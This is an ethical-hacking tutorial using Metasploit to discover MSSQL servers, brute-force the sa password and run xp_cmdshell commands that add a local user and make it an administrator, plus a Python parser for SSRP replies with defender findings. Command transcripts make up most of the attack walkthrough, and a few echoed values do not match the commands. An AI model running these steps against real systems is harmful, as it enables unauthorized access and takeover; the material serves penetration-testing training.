Advanced Ethical Hacking Institute in Pune

Using Metasploit to find MSSQL vulnerable systems

Searching for and locating MSSQL installations inside the internal network can be achieved using UDP foot-printing. When MSSQL is installed, it listens either on TCP port 1433 or on a randomized dynamic TCP port. If the port is dynamically assigned, querying UDP port 1434 provides information about the server, including the TCP port on which the service is listening.

Let us search and load the MSSQL ping module inside the msfconsole.

msf > search mssql

Exploits
========

   Name                                       Description
   ----                                       -----------
   windows/mssql/lyris_listmanager_weak_pass  Lyris ListManager MSDE Weak sa Password
   windows/mssql/ms02_039_slammer             Microsoft SQL Server Resolution Overflow
   windows/mssql/ms02_056_hello               Microsoft SQL Server Hello Overflow
   windows/mssql/mssql_payload                Microsoft SQL Server Payload Execution


Auxiliary
=========

   Name                       Description
   ----                       -----------
   admin/mssql/mssql_enum     Microsoft SQL Server Configuration Enumerator
   admin/mssql/mssql_exec     Microsoft SQL Server xp_cmdshell Command Execution
   admin/mssql/mssql_sql      Microsoft SQL Server Generic Query
   scanner/mssql/mssql_login  MSSQL Login Utility
   scanner/mssql/mssql_ping   MSSQL Ping Utility

msf > use auxiliary/scanner/mssql/mssql_ping
msf auxiliary(mssql_ping) > show options

Module options (auxiliary/scanner/mssql/mssql_ping):

   Name                 Current Setting  Required  Description
   ----                 ---------------  --------  -----------
   PASSWORD                              no        The password for the specified username
   RHOSTS                                yes       The target address range or CIDR identifier
   THREADS              1                yes       The number of concurrent threads
   USERNAME             sa               no        The username to authenticate as
   USE_WINDOWS_AUTHENT  false            yes       Use windows authentification

msf auxiliary(mssql_ping) > set RHOSTS 10.211.55.1/24
RHOSTS => 10.211.55.1/24
msf auxiliary(mssql_ping) > exploit

[*] SQL Server information for 10.211.55.128:
[*] tcp = 1433
[*] np = SSHACKTHISBOX-0pipesqlquery
[*] Version = 8.00.194
[*] InstanceName = MSSQLSERVER
[*] IsClustered = No
[*] ServerName = SSHACKTHISBOX-0
[*] Auxiliary module execution completed


The first command we issued was to search for any 'mssql' plugins. The second was 'use scanner/mssql/mssql_ping', which loads the scanner module for us.

Next, 'show options' shows us what we need to specify. 'set RHOSTS 10.211.55.1/24' sets the subnet range on which we want to look for SQL servers; you could specify a /16 or whatever range you want to go after. We would recommend increasing the number of threads, as this could take a long time with a single-threaded scanner.

After the 'run' command is issued, a scan is performed that pulls back specific information about the MSSQL server. As we can see, the name of the machine is "SSHACKTHISBOX-0" and the TCP port the service is listening on is 1433.
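The fields printed above are the contents of the SQL Server Resolution Protocol (SSRP) reply that the host sends on UDP 1434. As an added example that is not part of this tutorial or of Metasploit, the following Python parses a reply in that layout and turns it into defender-oriented findings (Browser service reachable, instance on a dynamic port, SQL Server 2000-era build). The message layout follows MS-SSRP (0x05, 2-byte little-endian length, ASCII key;value pairs with each instance terminated by ";;"); the sample reply is constructed to mirror the output above, and the second SQLEXPRESS instance and its port are assumptions.

```python
import struct

SVR_RESP = 0x05  # MS-SSRP message type of a server reply to a client ping/browse

def build_svr_resp(instances):
    """Build a constructed SVR_RESP so the parser can be exercised offline."""
    body = b""
    for fields in instances:
        # each instance is a run of "key;value;" pairs terminated by ";;"
        body += b"".join(f"{k};{v};".encode() for k, v in fields) + b";"
    return bytes([SVR_RESP]) + struct.pack("<H", len(body)) + body

def parse_svr_resp(packet):
    """Parse 0x05 + little-endian RESP_SIZE + ASCII RESP_DATA into instance dicts."""
    if len(packet) < 3 or packet[0] != SVR_RESP:
        raise ValueError("not an SSRP SVR_RESP message")
    (size,) = struct.unpack("<H", packet[1:3])
    if len(packet) - 3 < size:
        raise ValueError("truncated RESP_DATA")
    data = packet[3:3 + size].decode("ascii", errors="replace")
    instances = []
    for record in data.split(";;"):
        if record:
            fields = record.split(";")
            instances.append(dict(zip(fields[0::2], fields[1::2])))
    return instances

def review_instance(inst):
    """Findings a defender should act on for one discovered instance."""
    findings = ["SSRP answered on UDP/1434: Browser service reachable from this segment"]
    port = inst.get("tcp")
    if port and port != "1433":
        findings.append(f"dynamic TCP port {port}: only discoverable via UDP/1434")
    ver = inst.get("Version", "")
    if ver and int(ver.split(".")[0]) < 9:  # 8.x = SQL Server 2000
        findings.append("SQL Server 2000 or older build (ms02_039/ms02_056 era)")
    return findings

# Constructed sample modelled on the mssql_ping output above; not a real capture.
SAMPLE = build_svr_resp([
    [("ServerName", "SSHACKTHISBOX-0"), ("InstanceName", "MSSQLSERVER"),
     ("IsClustered", "No"), ("Version", "8.00.194"), ("tcp", "1433"),
     ("np", r"\\SSHACKTHISBOX-0\pipe\sql\query")],
    [("ServerName", "SSHACKTHISBOX-0"), ("InstanceName", "SQLEXPRESS"),  # assumed
     ("IsClustered", "No"), ("Version", "10.50.1600"), ("tcp", "49172")],
])

if __name__ == "__main__":
    for inst in parse_svr_resp(SAMPLE):
        print(inst["ServerName"], inst["InstanceName"], review_instance(inst))
```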

At this point you could use the 'scanner/mssql/mssql_login' module to brute-force the password by passing the module a dictionary file. Alternatively, you could also use Fast-Track, medusa, or hydra to do this. Once you successfully guess the password, there's a neat little module for executing the xp_cmdshell stored procedure.

msf auxiliary(mssql_login) > use auxiliary/admin/mssql/mssql_exec
msf auxiliary(mssql_exec) > show options

Module options (auxiliary/admin/mssql/mssql_exec):

   Name                 Current Setting                       Required  Description
   ----                 ---------------                       --------  -----------
   CMD                  cmd.exe /c echo OWNED > C:\owned.exe  no        Command to execute
   PASSWORD                                                   no        The password for the specified username
   RHOST                                                      yes       The target address
   RPORT                1433                                  yes       The target port
   USERNAME             sa                                    no        The username to authenticate as
   USE_WINDOWS_AUTHENT  false                                 yes       Use windows authentification


msf auxiliary(mssql_exec) > set RHOST 10.211.55.128
RHOST => 10.211.55.128
msf auxiliary(mssql_exec) > set MSSQL_PASS password
MSSQL_PASS => password
msf auxiliary(mssql_exec) > set CMD net user bacon ihazpassword /ADD
cmd => net user rel1k ihazpassword /ADD
msf auxiliary(mssql_exec) > exploit

The command completed successfully.

[*] Auxiliary module execution completed


Looking at the output of 'net user bacon ihazpassword /ADD', we have successfully added a user account named "bacon". From there we could issue 'net localgroup administrators bacon /ADD' to make it a local administrator on the system. We have full control over the system at this point.